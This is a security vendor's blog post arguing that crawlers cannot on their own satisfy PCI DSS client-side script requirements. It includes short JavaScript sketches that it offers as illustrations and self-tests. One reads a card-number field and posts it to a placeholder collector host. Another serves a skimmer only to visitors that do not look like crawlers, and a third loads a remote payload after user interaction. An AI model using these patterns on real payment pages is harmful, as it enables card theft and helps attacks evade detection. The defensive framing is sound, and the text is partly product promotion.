
Why crawlers can't help with PCI compliance (alone)

Thursday, July 3rd, 2025


Simon Wijckmans

Our compare page gives a clear overview of the different approaches to achieving client-side security and meeting the PCI DSS requirements (6.4.3 and 11.6.1).

Our solution (the hybrid proxy) outperforms other approaches in several categories. Let’s compare it to the crawler approach that many competitors in this space use: its benefits, and the many shortcomings that come with it.

In this article we’ll focus on PCI DSS 4.0.1 requirements 6.4.3 and 11.6.1. Visit our compare page for the full set of benefits and downsides in a broader security context.

“A method is implemented to confirm that each script is authorized”

6.4.3 All payment page scripts that are loaded and executed in the consumer’s browser are managed as follows:
- A method is implemented to confirm that each script is authorized.
- A method is implemented to assure the integrity of each script.
- An inventory of all scripts is maintained with written business or technical justification as to why each is necessary.

Requirement 6.4.3 calls for a mechanism to prevent unauthorized scripts from loading.

To remove any confusion, the PCI specification also states:

Unauthorized code cannot be executed in the payment page as it is rendered in the consumer’s browser.

For a lot of GRC teams, it is a challenge to allocate engineering effort to compliance requirements. Some solutions may lead you to believe you can meet the requirements without deploying any code or making any adjustments. That is, however, not correct.

This requirement can be met in a number of ways. A merchant can implement a Content Security Policy (CSP). CSP is notoriously hard to manage and maintain, but it is a valid way to meet this requirement.
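To make that concrete, a minimal policy might look like the header below. The allowed origin is a placeholder for whichever payment provider and first-party scripts you actually use, not a recommendation for any specific vendor:

Content-Security-Policy: script-src 'self' https://js.example-psp.com; object-src 'none'; base-uri 'self'

With a policy like this, the browser refuses to load any script from an origin that is not on the allowlist. The hard part, as noted, is keeping that allowlist accurate as your site and its third parties change.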

A merchant can opt to use a client-side agent that blocks certain JavaScript behaviours. However, that is not a silver bullet. There have been various examples of client-side attacks that stopped the security agent from functioning, partially or entirely disabling its capabilities, including its ability to block. Therefore, always test the solution you procure with a self-written client-side script. Unfortunately, most mid-level JavaScript engineers will not find writing one a major challenge.
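As a rough sketch of such a self-test (the field name and collector URL below are hypothetical, and this should only ever run against your own staging checkout with dummy data): if a snippet like this can still read a field and reach an endpoint you control while the agent is active, the agent’s blocking claim does not hold up.

// Self-test sketch: run only on your own staging checkout page, with dummy card data.
// The field name and collector URL are hypothetical placeholders.
document.addEventListener('input', (event) => {
  const field = event.target;
  if (field && field.name === 'card-number') {
    // If this request reaches your test collector while the agent is active,
    // the agent did not actually block the exfiltration path.
    fetch('https://collector.example.test/self-test', {
      method: 'POST',
      body: JSON.stringify({ value: field.value }),
      keepalive: true,
    });
  }
});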

Or, you can use a proxy service like c/side to stop a malicious script from serving in the first place. 

This specific line of the PCI DSS requirements is easily overlooked, but it comes back to the nature of the requirement: implement standards that stop credit card data from being stolen at the point of entry.

Crawlers don’t ‘see’ the actual payload and will not capture a serious attack

Crawlers work by visiting your site and indexing which scripts load. An important detail: they act like a user, but they are very clearly not a real human user. There are a number of simple giveaways, connecting from a cloud provider's IP address being one of them. This is a fundamental design flaw, because JavaScript delivery is dynamic by design: it is built to serve different versions of scripts based on time, user-agent, location, IP ranges…
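To illustrate why that matters, here is a hedged sketch (a hypothetical Node.js script host, with made-up data-center IP prefixes) of how a compromised third party can serve one payload to anything that looks like a crawler and another to real browsers:

// Illustrative sketch only: a script host that cloaks its payload from crawlers.
const http = require('http');

const CLEAN = 'console.log("analytics loaded");';
const SKIMMER = '/* malicious payload would be served here */';
const CLOUD_PREFIXES = ['34.', '35.', '52.']; // placeholder data-center ranges

http.createServer((req, res) => {
  const ua = req.headers['user-agent'] || '';
  const ip = (req.socket.remoteAddress || '').replace('::ffff:', '');
  const looksLikeCrawler =
    /headless|bot|crawler|spider/i.test(ua) ||
    CLOUD_PREFIXES.some((prefix) => ip.startsWith(prefix));

  res.setHeader('Content-Type', 'application/javascript');
  // Anything that looks like a crawler gets the clean script;
  // what looks like a real user gets the payload.
  res.end(looksLikeCrawler ? CLEAN : SKIMMER);
}).listen(8080);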

Bad actors of course leverage that dynamic behaviour to avoid detection. A crawler is unlikely to spot the actual attack first-hand, so the threat intelligence must come from other sources. This is why most solutions buy threat feed intel from third-party providers. These providers, however, tend to be late to the party. When the Polyfill attack happened, it took over 30 hours for any threat vendor to flag it, even though it had wide-scale press coverage. The domain was only flagged after Namecheap had already taken it down. Threat feed providers are also not specifically on the lookout for client-side attacks; sometimes they catch them, but equally, bad actors know how to avoid their researchers. Most of their client-side attack intel originates from social media.

We’ve established that a crawler can’t guarantee the payload it fetches is the one the user received, but let's imagine for a second that it is. Most malicious scripts are loaded as sub-requests triggered by user actions: clicking, scrolling, logging in, or adding something to a cart.

If a malicious script is only injected after a user interaction, the crawler will not see it unless it performs that exact interaction. That is practically impossible, as every page allows endless combinations of interactions. Example: only fetch the malicious script if a series of buttons is pressed 5 times, the user has scrolled a full window down, and the browser does not have dev tools open… “Synthetic crawling” claims to address this, but it really can’t for obvious technical reasons.
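A hedged sketch of that pattern (the payload URL is hypothetical) shows why no realistic amount of synthetic interaction catches it:

// Illustrative only: a payload that loads only after real user interaction,
// which a crawler that never clicks or scrolls will never trigger.
let buttonPresses = 0;
document.addEventListener('click', () => {
  buttonPresses += 1;
  const scrolledFullWindow = window.scrollY > window.innerHeight;
  if (buttonPresses >= 5 && scrolledFullWindow) {
    const script = document.createElement('script');
    script.src = 'https://cdn.example.test/payload.js'; // hypothetical URL
    document.head.appendChild(script);
  }
});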

If you apply a static security analysis approach to a dynamic problem, you do not address the security concern.

So are all crawlers useless?

No. The fundamental concept of a crawler is flawed, but if a vendor does not expect the crawler to see the malicious payload first-hand and can instead flag the parent script through other active detection methods, it can still address security concerns to a high enough level (for some). For example: the c/side crawler uses malicious script intel gathered through the proxied websites of other c/side customers. Malicious payloads are detected on those sites, and the parent scripts that injected them are flagged. So if the crawler receives a clean payload but knows that script is compromised on other sites, that will still lead to an alert.

“Wait, but I see all this interesting data in their dashboard?”

This is definitely a value-add. Crawlers can give you an understanding of some of the behaviours of some of the scripts on your site, populating the dashboard with interesting insights. But any bad script will know how to avoid showing up in those dashboards. Generally, people have a bias for shiny objects. A shiny dashboard full of interesting information leads people to think that the same information will be available on a bad day. That is, however, not the case.

Why consider a crawler at all?

Security is all about layering. Adding more solutions to monitor the same issues is usually a good thing. 

They’re relatively lightweight to deploy (usually), and give you a basic map of which scripts are present on your site at a given point in time. For a compliance team doing periodic checks, or audits not subject to PCI DSS, that’s helpful.

They also provide visibility into static changes, say when a new script URL suddenly appears or an existing one disappears. In that respect, a crawler is one step up from CSP, which does not provide any payload visibility. Read about the limitations of CSPs here. A crawler can help you keep an inventory of scripts (part of 6.4.3) and check security headers when it crawls (11.6.1), but it cannot prevent unauthorized scripts from loading. You would at least still need to add a CSP or an agent. So only buy a crawler if it also gives you a CSP endpoint or an agent.
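If you do pair a crawler with a CSP, a report-only policy is one common way to also get change signals from real browsers rather than only from the crawler's schedule. The origin and reporting endpoint below are placeholders (report-uri is older syntax, but still widely supported):

Content-Security-Policy-Report-Only: script-src 'self' https://js.example-psp.com; report-uri https://csp-reports.example.test/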

A crawler alone cannot provide you with PCI DSS compliance.


More About Simon Wijckmans

Founder and CEO of c/side. Building better security against client-side executed attacks, and making solutions more accessible to smaller businesses. Web security is not an enterprise-only problem.